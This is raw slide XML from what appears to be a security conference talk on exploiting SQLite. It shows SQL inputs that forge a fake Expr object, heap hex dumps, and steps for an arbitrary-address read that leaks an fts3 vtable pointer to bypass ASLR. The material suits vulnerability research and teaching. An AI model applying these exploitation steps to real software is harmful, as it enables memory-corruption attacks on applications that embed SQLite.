                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="123613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>BBBB_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="242147">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dirty="0" smtClean="0"/>
                        <a:t>BBBBB_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="182880">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dirty="0" smtClean="0"/>
                        <a:t>BBBBBB_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="182880">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dirty="0" smtClean="0"/>
                        <a:t>……</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>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dirty="0" smtClean="0"/>
                        <a:t>……</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390646" y="444254"/>
            <a:ext cx="4125192" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO table2100(A_0) VALUES (1337);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3976620850"/>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3075783"/>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3046988"/>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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 3D 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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en-US" altLang="ko-KR"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63 00 00 00 00 C0 80 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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3113892"/>
            <a:ext cx="5572125" cy="1323439"/>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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511942" y="2248837"/>
            <a:ext cx="5311490" cy="454487"/>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TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983347" y="2291414"/>
            <a:ext cx="1884218" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake Expr object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4876799" y="2486419"/>
            <a:ext cx="562839" cy="366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8183417" y="535550"/>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5" name="Curved Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6648757" y="-383257"/>
            <a:ext cx="1722523" cy="3996152"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43404"/>
              <a:gd name="adj2" fmla="val 10572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237220" y="2468461"/>
            <a:ext cx="2529840" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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5515592" y="4599546"/>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7" name="Curved Connector 6"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6840270" y="2468460"/>
            <a:ext cx="2661871" cy="2131085"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524324" y="2062777"/>
          <a:ext cx="4460840" cy="3957320"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1920708">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2540132">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>Column Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1337</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_1</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_2</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>A_3</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>BBBBBBBBBB……</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>\x58 \x24 \xA2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>\x43</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> \</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xAA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> \x7F</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="123613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>BBBB_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="242147">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dirty="0" smtClean="0"/>
                        <a:t>BBBBB_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="182880">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dirty="0" smtClean="0"/>
                        <a:t>BBBBBB_0</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
                        <a:t>NULL</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="182880">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dirty="0" smtClean="0"/>
                        <a:t>……</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>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dirty="0" smtClean="0"/>
                        <a:t>……</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390646" y="444254"/>
            <a:ext cx="4125192" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hex(BBBB…) from table2100;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5824A243AA7F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2916704894"/>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Creating a complete AAR</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Since this primitive reads only up to a NULL byte, progress 1 byte forward on each AAR attempt and read the data byte-by-byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Combine all bytes once the AAR is finished</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The read in bytes are all represented exactly the way as they were stored in memory. No UTF8 conversion problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Leak the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of the fts3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> object. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypasses ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1563733844"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 11</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756" y="787464"/>
            <a:ext cx="7113329" cy="5302923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2976239856"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176865" y="1103737"/>
            <a:ext cx="4795935" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>static</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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>const</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sqlite3_module</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fts3Module</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>xDisconnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>   */</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fts3DisconnectMethod,</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
